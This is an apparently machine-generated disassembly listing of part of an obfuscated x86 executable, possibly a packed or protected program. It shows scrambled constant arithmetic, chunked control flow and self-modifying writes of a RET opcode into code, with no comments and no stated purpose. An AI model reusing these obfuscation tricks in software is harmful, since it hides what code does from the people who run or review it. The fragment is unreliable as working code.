sub_442F2A	proc near		; DATA XREF: y2kk37jd:00440DDEo
		mov	byte ptr [eax],	0C3h
		jmp	sub_454B84
sub_442F2A	endp


; =============== S U B	R O U T	I N E =======================================



sub_442F32	proc near		; CODE XREF: sub_402129+110p
					; sub_442F32+5j
					; DATA XREF: ...
		call	sub_442F42
		jmp	ds:off_41E048
sub_442F32	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AAB

loc_442F3D:				; CODE XREF: sub_441AAB+1631Dj
		jmp	loc_44F807
; END OF FUNCTION CHUNK	FOR sub_441AAB

; =============== S U B	R O U T	I N E =======================================



sub_442F42	proc near		; CODE XREF: sub_442F32p
					; sub_445226:loc_4454C3j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C17D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00442469 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004455E6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F74F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004505BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004541DD SIZE 0000001E BYTES

		pop	edx
		jnb	loc_4541F1
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_442469
sub_442F42	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442F52	proc near		; CODE XREF: sub_447FB4+5A10j
					; y2kk37jd:loc_44E772j	...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FA54 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004487F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A2A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004536CA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455FC8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045774B SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004582D5 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00459FA4 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		jnz	loc_451A2A
		mov	eax, [esp+0]
		push	esi
		mov	esi, edx
		call	sub_43C46D

loc_442F69:				; CODE XREF: sub_453BA8+4D6Fj
		jmp	loc_459FA4
sub_442F52	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_442F6E:				; CODE XREF: sub_44D51F+9j
		jmp	loc_44F9EA
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------

loc_442F73:				; CODE XREF: y2kk37jd:00447F4Bj
		jnz	loc_447E21
		jmp	loc_457BE9
; ---------------------------------------------------------------------------

loc_442F7E:				; CODE XREF: y2kk37jd:loc_454FD0j
		pop	ecx

loc_442F7F:				; CODE XREF: y2kk37jd:loc_43F240j
		add	ecx, 91F3884Dh
		xor	ecx, 3177EA81h
		and	ecx, 0EF3031A7h
		jmp	loc_457E41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_442F96:				; CODE XREF: sub_44B814-2D23j
		pushf
		jmp	loc_455389
; END OF FUNCTION CHUNK	FOR sub_44B814

; =============== S U B	R O U T	I N E =======================================



sub_442F9C	proc near		; DATA XREF: y2kk37jd:004400B1o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F124 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044337F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444AD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D723 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DA00 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A6BF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045B280 SIZE 00000017 BYTES

		add	edx, 0E3BCBF98h
		popf
		xchg	edx, [esp-4+arg_0]
		push	ebx
		jmp	loc_44D723
sub_442F9C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_442FAC	proc near		; DATA XREF: sub_44EAA2-E9B8o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004513D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004548F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045967E SIZE 00000017 BYTES

		push	ebx
		push	0BA273A56h
		pop	ebx
		sub	ebx, 0E093A2E7h
		rol	ebx, 1Ah
		jmp	loc_4513D6
sub_442FAC	endp

; ---------------------------------------------------------------------------

loc_442FC1:				; CODE XREF: y2kk37jd:loc_4456C8j
		xchg	esi, [esp]
		call	sub_449775
		mov	eax, 469EF90Dh
		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp]
		jmp	loc_448BF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_442FD9:				; CODE XREF: sub_453867-CDE2j
		jz	loc_44F879
		jmp	loc_44EA24
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4492F7

loc_442FE4:				; CODE XREF: sub_4492F7:loc_43CA12j
		jz	loc_44D915
		jmp	loc_443C52
; END OF FUNCTION CHUNK	FOR sub_4492F7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_299. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_442FF0:				; CODE XREF: sub_43E25A+1E11Ej
		jmp	nullsub_513
; END OF FUNCTION CHUNK	FOR sub_43E25A
; ---------------------------------------------------------------------------
		shr	edi, 18h
		jmp	loc_458C29
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_442FFD:				; CODE XREF: sub_44B924:loc_44FAE8j
					; sub_448658:loc_457E7Cj
		add	eax, [ebp-4]
		add	eax, 5
		cmp	eax, ds:dword_44FC84
		jz	loc_456D49
		jmp	loc_45A7C1
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_443014:				; CODE XREF: sub_445226+DCB0j
		and	ebp, 5F3E0AD2h
		jmp	loc_459FB6
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44594E

loc_44301F:				; CODE XREF: sub_44594E:loc_442AF8j
		mov	edx, ebp
		call	sub_43D4CE
; END OF FUNCTION CHUNK	FOR sub_44594E
; START	OF FUNCTION CHUNK FOR sub_455613

loc_443026:				; CODE XREF: sub_455613-3618j
		jl	loc_451064
; END OF FUNCTION CHUNK	FOR sub_455613
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44302C:				; CODE XREF: sub_43F911+9BD1j
		jmp	loc_44AE06
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_443031:				; CODE XREF: sub_443360-239Cj
		jmp	nullsub_255
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
		pushf
		mov	esi, [ecx]
		or	ebp, 95C9D3EAh
		jmp	loc_451064
; ---------------------------------------------------------------------------

locret_443044:				; CODE XREF: y2kk37jd:0045A221j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E2D2

loc_443045:				; CODE XREF: sub_43E2D2+FBEEj
		jmp	nullsub_148
; END OF FUNCTION CHUNK	FOR sub_43E2D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451711

loc_44304A:				; CODE XREF: sub_451711-70DFj
					; sub_43ED19+113C1j
		jmp	sub_44CE06
; END OF FUNCTION CHUNK	FOR sub_451711
; ---------------------------------------------------------------------------

loc_44304F:				; DATA XREF: sub_451464:loc_443B4Eo
		rol	eax, 1Ch
		push	eax
		call	sub_4526B7
		retn
; ---------------------------------------------------------------------------

loc_443059:				; CODE XREF: y2kk37jd:0045536Ej
		push	edi
		mov	edi, ebp
		xchg	edi, [esp]
		call	sub_45C104
; START	OF FUNCTION CHUNK FOR sub_444F61

loc_443064:				; CODE XREF: sub_444F61+1354Ej
		jmp	nullsub_244
; END OF FUNCTION CHUNK	FOR sub_444F61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_443069:				; CODE XREF: sub_457A46-12BE2j
		jmp	nullsub_425
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44306E:				; CODE XREF: sub_44113A+14j
		jmp	loc_447752
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_443073:				; CODE XREF: sub_456809+418Bj
		jnp	loc_44B17E

loc_443079:				; CODE XREF: sub_44594E:loc_45370Fj
		and	edi, 21AC5290h
		rol	edi, 7
		add	edi, 3042A260h
		xchg	edi, [esp+8+var_8]
		jmp	loc_45C44B
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44516F

loc_443090:				; CODE XREF: sub_44516F+8C33j
		xor	ebx, 0B545F0A6h
		and	ebx, 5B6C424Bh
		xor	ebx, 69C4B2B2h
		add	ebx, 0DD58EEBBh
		mov	[ebx], eax
		jmp	loc_4457F1
; END OF FUNCTION CHUNK	FOR sub_44516F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_4430B0:				; CODE XREF: y2kk37jd:004509FBj
					; sub_454D0F+4942j
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444180

loc_4430B5:				; CODE XREF: sub_444180+Ej
		jmp	loc_454CAB
; END OF FUNCTION CHUNK	FOR sub_444180
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_4430BA:				; CODE XREF: sub_454413:loc_456953j
		jnz	loc_441A9D
		jmp	loc_447277
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------

loc_4430C5:				; DATA XREF: sub_44CC31:loc_444791o
		mov	byte ptr [eax],	0C3h
		jmp	loc_44E66D

; =============== S U B	R O U T	I N E =======================================



sub_4430CD	proc near		; CODE XREF: sub_41A8D9+A5p
					; sub_41A8D9+1B6p ...
		call	sub_4430DD
		jmp	ds:off_41E018
sub_4430CD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C03C

loc_4430D8:				; CODE XREF: sub_45C03C-17426j
		jmp	loc_440557
; END OF FUNCTION CHUNK	FOR sub_45C03C

; =============== S U B	R O U T	I N E =======================================



sub_4430DD	proc near		; CODE XREF: y2kk37jd:0043F0FBj
					; sub_4430CDp ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00445C86 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F8B8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459E4F SIZE 00000009 BYTES

		jns	loc_459E4F
		jmp	loc_445C86
sub_4430DD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_4430E8:				; CODE XREF: sub_443EAB:loc_440014j
					; y2kk37jd:loc_45C0FEj
		sub	ecx, 8C98AED0h
		rol	ecx, 1Ch
		xor	ecx, 0ABD6B5A5h
		add	eax, ecx
		jmp	loc_45AEEA
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CA

loc_4430FE:				; CODE XREF: sub_4424CA+11DB5j
		push	0FA81BCFFh
		xchg	edi, eax
		jmp	loc_43EFBD
; END OF FUNCTION CHUNK	FOR sub_4424CA

; =============== S U B	R O U T	I N E =======================================



sub_44310A	proc near		; DATA XREF: y2kk37jd:0045A676o

; FUNCTION CHUNK AT 0043E7F5 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00447AA1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004481F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004580A9 SIZE 0000000B BYTES

		push	7AAE78A3h
		pop	edx
		or	edx, 8F565BDCh
		test	edx, 8
		jmp	loc_4481F4
sub_44310A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_443121:				; CODE XREF: sub_459672:loc_44F4BDj
		xchg	edi, [esp-10h+arg_C]
		sbb	ebx, eax
		cmp	ecx, ebx
		and	edx, ebx
		jno	loc_43DE4D
		ror	ebx, 8
		add	ebx, edx
		jmp	loc_440C63
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------

loc_44313A:				; CODE XREF: y2kk37jd:0044074Cj
		jle	loc_44D359
; START	OF FUNCTION CHUNK FOR sub_44DE9F

loc_443140:				; CODE XREF: sub_44DE9F-D772j
		add	edi, 9C7F2D03h
		xchg	edi, [esp+0]
		jmp	loc_45B80D
; END OF FUNCTION CHUNK	FOR sub_44DE9F

; =============== S U B	R O U T	I N E =======================================



sub_44314E	proc near		; DATA XREF: sub_44D0F1+9o

; FUNCTION CHUNK AT 0043EC3D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449D5C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044DCC0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045C628 SIZE 0000000B BYTES

		push	0AA2FE2Fh
		pop	eax
		add	eax, 360A4EA4h
		sub	eax, 155D13F7h
		jns	loc_43EC3D

loc_443166:				; CODE XREF: y2kk37jd:0044E3E7j
					; y2kk37jd:loc_45A3DDj
		jmp	loc_449D5C
sub_44314E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		or	eax, 453EA49Fh
		cmp	ebx, 0AD0F4A93h
		jmp	loc_451DD7
; ---------------------------------------------------------------------------
		dd 9BFDEA81h, 0F281D7D0h, 6E52EE8h, 8832E281h, 386805E5h
		dd 0E900451Dh, 0FFFF9233h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_443198:				; CODE XREF: sub_44113A+8C32j
		call	sub_440CD1
		retn
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
		dw 2F70h
dword_4431A0	dd 0			; DATA XREF: sub_44113A+6r
					; sub_44113A:loc_45B336r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C054

loc_4431A4:				; CODE XREF: sub_43C054+1D300j
		jmp	loc_452D22
; END OF FUNCTION CHUNK	FOR sub_43C054
; ---------------------------------------------------------------------------

loc_4431A9:				; DATA XREF: sub_44113A-2676o
					; sub_44113A+8EA7o
		fmul	qword ptr [ebx+2B11504Fh]
		mov	al, ds:23664A28h
		pop	esp
		mov	[ebx+0], gs
; START	OF FUNCTION CHUNK FOR sub_456410

loc_4431B9:				; CODE XREF: sub_456410+3j
		jmp	loc_43FFBA
; END OF FUNCTION CHUNK	FOR sub_456410
; ---------------------------------------------------------------------------

loc_4431BE:				; CODE XREF: y2kk37jd:0044C836j
		jmp	loc_441B48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_4431C3:				; CODE XREF: sub_4577FE-F9E2j
		jmp	sub_44461D
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4431C8:				; CODE XREF: sub_4411C3+56C2j
		jmp	loc_43CCE4
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		jno	loc_44710F
		push	2FADE226h
		jmp	loc_4564BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_4431DD:				; CODE XREF: sub_44001E:loc_459CA1j
					; sub_44001E+19C8Dj
		add	eax, 3F176651h
		xor	eax, 0C703E528h
		add	eax, ebp
		add	eax, 74E6E753h
		push	ebx
		mov	ebx, ebp
		jmp	loc_448C8C
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------

loc_4431F9:				; CODE XREF: y2kk37jd:loc_457089j
		jns	loc_4457AF
; START	OF FUNCTION CHUNK FOR sub_44B86B

loc_4431FF:				; CODE XREF: sub_44B86B+93E3j
		jmp	nullsub_153
; END OF FUNCTION CHUNK	FOR sub_44B86B
; ---------------------------------------------------------------------------
		xchg	ecx, [eax]
		cmp	ebx, 0F4E1F081h
		jmp	loc_449F10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_443211:				; CODE XREF: sub_4477A2+7C35j
		jge	loc_4492BE

loc_443217:				; CODE XREF: y2kk37jd:00453623j
		sub	ebp, 8DA8060Dh
		ror	eax, 5
		jmp	loc_4492BE
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------
		jnb	loc_459FAF
		jmp	loc_44FB6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C922

loc_443230:				; CODE XREF: sub_44C922:loc_459B7Fj
		xchg	edi, [esp+0]
		jmp	sub_45AAD1
; END OF FUNCTION CHUNK	FOR sub_44C922
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C6ED

loc_443238:				; CODE XREF: sub_45C6ED-1C02Aj
		cdq
		jmp	loc_452BB3
; END OF FUNCTION CHUNK	FOR sub_45C6ED
; ---------------------------------------------------------------------------
		mov	ds:dword_41E178, eax
; START	OF FUNCTION CHUNK FOR sub_43E389

loc_443244:				; CODE XREF: sub_43E389+92F0j
		lea	eax, nullsub_15
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_15
; END OF FUNCTION CHUNK	FOR sub_43E389
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp]
		push	edx
		jmp	loc_453BCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_443261:				; CODE XREF: sub_43EF4F+16B4Bj
		mov	edx, [esp+0]
		push	eax
		mov	eax, edx
		nop
		jmp	loc_43EB17
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------

loc_44326D:				; CODE XREF: y2kk37jd:00454CDDj
		call	sub_440CD1
		push	eax
		jmp	loc_455212

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_443278	proc near		; CODE XREF: sub_456541j

; FUNCTION CHUNK AT 00455E70 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045685C SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_45685C
sub_443278	endp

; ---------------------------------------------------------------------------
		xchg	ecx, eax
		add	eax, esi
		jmp	sub_453FBA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458CE4

loc_44328A:				; CODE XREF: sub_458CE4:loc_43C21Fj
		jge	loc_454D9F
; END OF FUNCTION CHUNK	FOR sub_458CE4
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_443290:				; CODE XREF: sub_44BD20+EFDj
		jmp	loc_43D550
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------
		mov	edx, eax

loc_443297:				; CODE XREF: y2kk37jd:0043FF1Ej
		shl	edi, 5
		jmp	loc_454D9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446303

loc_44329F:				; CODE XREF: sub_446303-981Cj
		add	eax, 2CC32F0Ah
		push	offset sub_457D5A
		jmp	nullsub_168
; END OF FUNCTION CHUNK	FOR sub_446303
; ---------------------------------------------------------------------------
		xchg	ebx, [ebp+0]
		jmp	loc_44A314
; ---------------------------------------------------------------------------

locret_4432B7:				; CODE XREF: y2kk37jd:00458368j
		retn
; ---------------------------------------------------------------------------

loc_4432B8:				; CODE XREF: y2kk37jd:00456B0Dj
		jmp	loc_4511FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452EA0

loc_4432BD:				; CODE XREF: sub_452EA0+Ej
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_452EA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_4432C2:				; CODE XREF: sub_456990-82E7j
		jmp	loc_443A2A
; END OF FUNCTION CHUNK	FOR sub_456990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4432C7:				; CODE XREF: sub_445226-1EE6j
		jmp	loc_446CFB
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442E78

loc_4432CC:				; CODE XREF: sub_442E78+1Fj
		jmp	nullsub_181
; END OF FUNCTION CHUNK	FOR sub_442E78
; ---------------------------------------------------------------------------
		mov	edx, 0DD960900h
		call	sub_440CD1
		push	ebp
		mov	ebp, eax
		jmp	loc_45B9E4
; ---------------------------------------------------------------------------
		call	sub_445FFF

loc_4432E8:				; CODE XREF: y2kk37jd:loc_4550A6j
		pop	edx
		and	edx, 98ED05D8h
		add	edx, 0F7DC98DCh
		xchg	edx, [esp]
		jmp	sub_443525

; =============== S U B	R O U T	I N E =======================================



sub_4432FD	proc near		; CODE XREF: sub_4479FB+3j

; FUNCTION CHUNK AT 0043C60B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00440359 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441D64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446C28 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D256 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E462 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00451431 SIZE 00000005 BYTES

		push	ebx
		push	0BA0CBBDCh
		pop	ebx
		sub	ebx, 0C17BA62Dh
		jb	loc_44E462
sub_4432FD	endp

; START	OF FUNCTION CHUNK FOR sub_453583

loc_443310:				; CODE XREF: sub_453583-E600j
		jmp	loc_44D052
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_452A00
; ---------------------------------------------------------------------------
		push	ecx
		call	sub_459E88
; START	OF FUNCTION CHUNK FOR sub_447D42

loc_443321:				; CODE XREF: sub_447D42+3j
		jmp	loc_441FAB
; END OF FUNCTION CHUNK	FOR sub_447D42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_443326:				; CODE XREF: sub_44610D+D12Fj
		js	loc_44EE57

loc_44332C:				; CODE XREF: sub_44610D:loc_441B3Bj
		add	edi, 44620A72h
		mov	[edi], eax
		pop	edi
		jmp	loc_457AC1
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44333A:				; CODE XREF: sub_445226:loc_45BAD4j
		jz	loc_452E0B
		jmp	loc_4432C7
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_443345:				; CODE XREF: y2kk37jd:0045C547j
		xchg	esi, [ecx]

loc_443347:				; CODE XREF: y2kk37jd:0044BFAAj
		rol	eax, 19h
		test	eax, 20000000h
		jmp	loc_457879
; ---------------------------------------------------------------------------
		or	edi, 98C31123h
		jmp	loc_44D713

; =============== S U B	R O U T	I N E =======================================



sub_443360	proc near		; CODE XREF: sub_44EFD5+Dj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440FBD SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00441C93 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443031 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044378F SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044939B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D967 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DD30 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EBF0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044ED9C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045227C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458A05 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458B22 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B65F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045C450 SIZE 0000000B BYTES

		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+0]
		mov	esp, ebp
		pop	ebp
		jmp	loc_44939B
sub_443360	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_351. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44336F:				; CODE XREF: y2kk37jd:00455609j
		jns	loc_44602B
		xchg	esi, [edi]
		rol	esi, 19h
		jmp	loc_454754
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F9C

loc_44337F:				; CODE XREF: sub_442F9C+AA70j
		ja	loc_4500D4
		test	ebp, esi
		jmp	loc_45A6BF
; END OF FUNCTION CHUNK	FOR sub_442F9C
; ---------------------------------------------------------------------------

loc_44338C:				; CODE XREF: y2kk37jd:loc_43D948j
		pop	ebx
		adc	ebx, 0DA4FF90Fh
		sbb	edi, 11C89FFBh
		jmp	loc_458D25
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_44339E:				; CODE XREF: sub_44C4BC+C30j
		jz	loc_458C75
		jmp	loc_448267
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
		mov	esi, 0E0DE40B4h
		jmp	sub_4551F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4433B3:				; CODE XREF: sub_44AC89:loc_451352j
		rol	edx, 19h
		xor	edx, 6E1599DBh
		rol	edx, 1Dh
		jb	loc_43F467
; END OF FUNCTION CHUNK	FOR sub_44AC89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4433C6:				; CODE XREF: y2kk37jd:loc_4472EAj
		cmp	dword ptr [ebp-4], 7
		jnz	loc_458D82
		jmp	loc_452029
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_4433D5:				; CODE XREF: sub_4448E2:loc_452ACAj
		jz	loc_451862
		jmp	loc_456B8D
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_4433E0:				; CODE XREF: y2kk37jd:loc_44DCBBj
		jz	loc_4457C3
		mov	eax, [ecx]
		or	ebp, 0E6216B1Bh
		jmp	loc_4457C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_4433F3:				; CODE XREF: sub_44B0D0-E24Cj
		jnz	loc_43BAC8
		jmp	loc_43DE81
; END OF FUNCTION CHUNK	FOR sub_44B0D0

; =============== S U B	R O U T	I N E =======================================



sub_4433FE	proc near		; CODE XREF: y2kk37jd:loc_452951j
					; DATA XREF: sub_452935+12o
		mov	[eax], edx
		pop	eax
sub_4433FE	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_440337

loc_443401:				; CODE XREF: sub_440337+8B54j
					; sub_440337+C7AAj
		xchg	eax, edx
		push	ebx
		push	0CE17E641h
		pop	ebx
		or	ebx, 978ED3FCh
		add	ebx, 37D7135Ch
		jmp	loc_444AB8
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------

loc_44341A:				; CODE XREF: y2kk37jd:00449DA6j
		not	eax
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_44341C:				; CODE XREF: sub_43ED19:loc_449D92j
		and	ecx, 0BCB4C209h
		xor	ecx, 587DEC7h
		add	ecx, 7EA117EEh
		mov	[ecx], edx
		pop	ecx

loc_443431:				; CODE XREF: y2kk37jd:00443F96j
					; sub_454B16+6j
		xchg	eax, edx
		push	esi
		jmp	loc_442D14
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_443438:				; CODE XREF: sub_45689F+403Dj
		push	esi
		push	61648504h
		pop	esi

loc_44343F:				; CODE XREF: y2kk37jd:loc_4480C5j
		or	esi, 7439127Fh

loc_443445:				; CODE XREF: sub_440040:loc_43D29Ej
		sub	esi, 0D57FD5Eh
		test	esi, 4000000h

loc_443451:				; DATA XREF: jlrllt49:off_421D8Co
		jmp	loc_444F5C
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_443456:				; CODE XREF: sub_453B0B+706Aj
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		call	sub_43F618
		push	9BC8E20Fh
		jmp	loc_43D42E
; END OF FUNCTION CHUNK	FOR sub_453B0B

; =============== S U B	R O U T	I N E =======================================



sub_44346B	proc near		; CODE XREF: sub_43E1E9+8p
					; sub_44594E+14736j

; FUNCTION CHUNK AT 0043C729 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043CA22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CE47 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043E9B7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043EA00 SIZE 00000011 BYTES
